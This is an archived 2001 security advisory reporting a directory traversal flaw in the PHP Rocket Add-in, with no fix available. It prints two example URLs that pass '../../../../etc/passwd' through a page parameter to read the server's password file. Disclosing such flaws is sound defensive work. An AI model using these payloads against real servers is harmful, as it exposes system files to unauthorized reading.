TUCoPS :: Web :: PHP :: web4961.htm

PHP Rocket Add-in allows read access to files
31th Dec 2001 [SBWID-4961]
COMMAND

	PHP Rocket Add-in allows read access to files

SYSTEMS AFFECTED

	PHP Rocket Add-in

PROBLEM

	Zaleth tried :
	 

	http://www.someuser.com/phprocketaddin/?page=../../../../etc/passwd

	

	http://www.someuser.com/index.php?page=../../../../etc/passwd

	

	... and it worked.

SOLUTION

	Not yet

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH